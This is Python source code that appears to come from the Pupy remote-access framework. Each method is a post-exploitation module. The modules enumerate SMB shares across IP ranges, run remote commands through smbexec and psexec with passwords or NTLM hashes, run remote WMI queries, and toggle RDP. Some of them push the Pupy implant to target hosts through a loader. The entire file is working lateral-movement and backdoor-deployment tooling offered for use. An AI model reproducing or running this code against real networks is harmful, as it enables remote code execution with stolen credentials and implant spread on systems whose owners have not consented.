def run(self, args): # Retrieve local shared folders try: if args.local: if self.client.is_windows(): print self.client.conn.modules[ 'pupwinutils.drives'].shared_folders() else: self.warning( 'this module works only for windows. Try using: run shares remote -t 127.0.0.1' ) return except: pass # Retrieve remote shared folders if not args.target: self.error("target (-t) parameter must be specify") return if "/" in args.target: hosts = IPNetwork(args.target) else: hosts = list() hosts.append(args.target) connect = self.client.remote('pupyutils.share_enum', 'connect') for host in hosts: result = connect(str(host), args.port, args.user, args.passwd, args.hash, args.domain) if 'error' in result: if 'os' in result: self.error('{}:{} OS={} NAME={}: {}'.format( host, args.port, result['os'], result['name'], result['error'])) else: self.error('{}:{}: {}'.format(host, args.port, result['error'])) else: self.success('{}:{} OS=[{}] NAME=[{}] AUTH={}'.format( host, args.port, result['os'], result['name'], result['auth'])) shares = [{ 'SHARE': x[0], 'ACCESS': x[1] } for x in result['shares']] self.table(shares, ['SHARE', 'ACCESS'])
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) smbexec = self.client.remote('pupyutils.psexec', 'smbexec') completions = [] for host in hosts: if args.command in ('pupy86', 'pupy32', 'pupy64'): _, completion = powerloader.serve( self, self.client.get_conf(), host=str(host), port=args.port, user=args.user, domain=args.domain, password=args.passwd, ntlm=args.hash, execm=args.execm, timeout=args.timeout, arch='x64' if args.command == 'pupy64' else 'x86') completions.append(completion) continue output, error = smbexec(str(host), args.port, args.user, args.domain, args.passwd, args.hash, args.command, args.share, args.execm, args.codepage, args.timeout, not args.noout) if output: self.log(output) if error: self.error(error) if completions: self.info('Wait for completions') for completion in completions: if not completion.is_set(): completion.wait()
def run(self, args): wql = self.client.remote('pupyutils.psexec', 'wql') if args.query: cmdline = ' '.join(args.query) else: cmdline = 'SELECT DatabaseDirectory,BuildVersion,LoggingDirectory '\ 'FROM Win32_WMISetting' if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) for host in hosts: try: columns, values = wql(str(host), args.port, args.user, args.domain, args.passwd, args.hash, cmdline, args.timeout) if not columns: return elif len(columns) == 1: self.log( List(list(_stringify(x[0]) for x in values), caption=columns[0])) else: if not values: return elif len(values) == 1: records = [{ 'KEY': column, 'VALUE': _stringify(values[0][idx]) } for idx, column in enumerate(columns)] self.log(Table(records, ['KEY', 'VALUE'])) else: records = [{ column: _stringify(value[idx]) for idx, column in enumerate(columns) } for value in values] self.log(Table(records, columns)) except Exception as e: self.error(e)
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) smbexec = self.client.remote('pupyutils.psexec', 'smbexec') for host in hosts: output, error = smbexec(host, args.port, args.user, args.domain, args.passwd, args.hash, args.command, args.share, args.execm, args.codepage, args.timeout, not args.noout) if output: self.log(output) if error: self.error(error)
def run(self, args): # TO DO: enable multi RDP session, see MIMIKATZ for example if args.local: if args.enable or args.disable: if not self.client.is_windows(): self.error( "This option could be used only on windows hosts") return # check if admin if not self.client.conn.modules[ "pupwinutils.rdp"].check_if_admin(): self.error("Admin privileges are required") with redirected_stdio(self): if args.enable: self.client.conn.modules["pupwinutils.rdp"].enable_rdp( ) if args.disable: self.client.conn.modules[ "pupwinutils.rdp"].disable_rdp() elif args.remote: if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target) for host in hosts: with redirected_stdio(self): self.client.conn.modules["pupyutils.rdp_check"].check_rdp( host, args.username, args.password, args.domain, args.hashes)
def run(self, args): if "/" in args.target[0]: hosts = IPNetwork(args.target[0]) else: hosts = list() hosts.append(args.target[0]) psexec = self.client.remote('pupyutils.psexec', 'psexec', False) completions = [] for host in hosts: if args.command in ('pupy86', 'pupy32', 'pupy64'): _, completion = powerloader.serve( self, self.client.get_conf(), host=str(host), port=args.port, user=args.user, domain=args.domain, password=args.passwd, ntlm=args.hash, execm=args.execm, timeout=args.timeout, arch='x64' if args.command == 'pupy64' else 'x86') if completion: completions.append(completion) continue completion = Event() def _on_data(data): if args.verbose: self.log(u'{}:{}: {}'.format(host, args.port, data)) else: self.stdout.write(data) def _on_complete(message): try: if message: self.error(message) elif message and args.verbose: self.info('Completed') finally: completion.set() psexec(str(host), args.port, args.user, args.domain, args.passwd, args.hash, args.command, args.execm, args.codepage, args.timeout, not args.noout, None, _on_data, _on_complete, args.verbose) completions.append(completion) if completions: if args.verbose: self.info('Wait for completions') for completion in completions: if not completion.is_set(): completion.wait()